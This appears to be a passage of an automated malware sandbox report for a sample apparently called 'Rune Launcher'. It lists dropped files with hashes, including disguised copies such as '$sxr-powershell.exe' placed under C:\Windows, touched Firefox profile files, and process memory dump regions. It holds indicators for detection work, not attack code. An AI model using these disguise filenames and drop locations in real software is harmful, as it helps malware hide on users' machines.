C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5699p0ky.default-release\activity-stream.discovery_stream.json.tmp

Filesize
22KB

MD5
70657e192adb23926dbe3001529c2bff

SHA1
a2ed50e86a59cd06edae3e81a659bff554867693

SHA256
b4b30573a14fcca893b636a181d3ca5a3bbfd0c79fe20f31f87a7cc52799c99e

SHA512
dd0c78ed5e6d574936acfb3f9e775fc0efde68b7d15f6a34bf6c87d8a553f03f9198ee15375d1bef10de1caea4fd86502b49cff6b8f8d54cc0c096846d239e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_41we0x02.azm.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5699p0ky.default-release\prefs-1.js

Filesize
6KB

MD5
3f1708941861c45f3b9894fb367bdaa9

SHA1
bc9a8bc44c2796a5b4bdc06f739e82834f31afa0

SHA256
730791bc3a2c1cc148ef59cb6a43a4c2e4e99e0b714c6d7e1137e0523a3594f2

SHA512
a81e876561f909da0f2c57d1059f46f04af30421c72049da40552fe8c25151da094a2dcb0c46763583a8e7ed4524093e6814e12e8efb342dfcfa68e87afb1482

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5699p0ky.default-release\sessionCheckpoints.json.tmp

Filesize
212B

MD5
29ce37dc02c78bbe2e5284d350fae004

SHA1
bab97d5908ea6592aef6b46cee1ded6f34693fa2

SHA256
1bfee61e2f346959c53aa41add4b02d2b05c86c9f19ffefe1018f4a964bf4693

SHA512
53a9eb746e193c088210d8eaa6218d988f3a67ee4cb21844d682ff0178db040932404f5ce2f3cf8b4576313ba0ec33c04ca288c3412bfa5df7dd8230cc2068bb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5699p0ky.default-release\sessionstore.jsonlz4

Filesize
915B

MD5
e2ec4dd82e9a050906560132072b2f94

SHA1
2d70a3e2911fde1ec98cd382b3dee65895c570c8

SHA256
40d9884fd857d604d0c364750ae0a7951364e0d547b2ffd8b2c69ccd6ec18f65

SHA512
416e0add79f68953bfd6bc7908256751ca756d9c93ce6e45ec4974acbc2d7cb7801d71849790e28740c0b0da4fc4bc08901ed8bb73bfaef2b9407ff99ad02cd1

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
265KB

MD5
94912c1d73ade68f2486ed4d8ea82de6

SHA1
524ab0a40594d2b5f620f542e87a45472979a416

SHA256
9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

SHA512
f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
265KB

MD5
94912c1d73ade68f2486ed4d8ea82de6

SHA1
524ab0a40594d2b5f620f542e87a45472979a416

SHA256
9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9

SHA512
f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
14KB

MD5
98447a7f26ee9dac6b806924d6e21c90

SHA1
a67909346a56289b7087821437efcaa51da3b083

SHA256
c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed

SHA512
c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/4168-183-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4168-180-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4280-563-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4280-561-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-564-0x00007FFBFD020000-0x00007FFBFD0CE000-memory.dmp

Filesize
696KB

Download
memory/4280-562-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4280-557-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-552-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-551-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4280-239-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4280-241-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-240-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-275-0x00007FFBF6B50000-0x00007FFBF6B60000-memory.dmp

Filesize
64KB

Download
memory/4280-268-0x000002167F450000-0x000002167F460000-memory.dmp

Filesize
64KB

Download
memory/4280-271-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4280-272-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4280-273-0x00007FFBFD020000-0x00007FFBFD0CE000-memory.dmp

Filesize
696KB

Download
memory/4784-141-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-142-0x00007FFBFD020000-0x00007FFBFD0CE000-memory.dmp

Filesize
696KB

Download
memory/4784-168-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-169-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-165-0x0000022180E50000-0x0000022180E72000-memory.dmp

Filesize
136KB

Download
memory/4784-238-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-145-0x0000022180290000-0x0000022180CE0000-memory.dmp

Filesize
10.3MB

Download
memory/4784-179-0x0000022181100000-0x000002218110A000-memory.dmp

Filesize
40KB

Download
memory/4784-147-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-10-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-164-0x0000022180DF0000-0x0000022180E48000-memory.dmp

Filesize
352KB

Download
memory/4784-185-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-163-0x0000022180D90000-0x0000022180DE6000-memory.dmp

Filesize
344KB

Download
memory/4784-148-0x0000022180CE0000-0x0000022180D86000-memory.dmp

Filesize
664KB

Download
memory/4784-8-0x00000221CC800000-0x00000221CC822000-memory.dmp

Filesize
136KB

Download
memory/4784-12-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-172-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-144-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-690-0x00007FFBF6B50000-0x00007FFBF6B60000-memory.dmp

Filesize
64KB

Download
memory/4784-691-0x00007FFBFD020000-0x00007FFBFD0CE000-memory.dmp

Filesize
696KB

Download
memory/4784-692-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-693-0x00007FFBF3440000-0x00007FFBF3E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4784-170-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-143-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4784-267-0x00007FFBFD020000-0x00007FFBFD0CE000-memory.dmp

Filesize
696KB

Download
memory/4784-138-0x00000221CC580000-0x00000221CC5A4000-memory.dmp

Filesize
144KB

Download
memory/4784-27-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-16-0x00000221E4B80000-0x00000221E4BF6000-memory.dmp

Filesize
472KB

Download
memory/4784-13-0x00000221E49F0000-0x00000221E4A00000-memory.dmp

Filesize
64KB

Download
memory/4784-600-0x00007FFBFF5D0000-0x00007FFBFF7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4852-184-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/4852-187-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download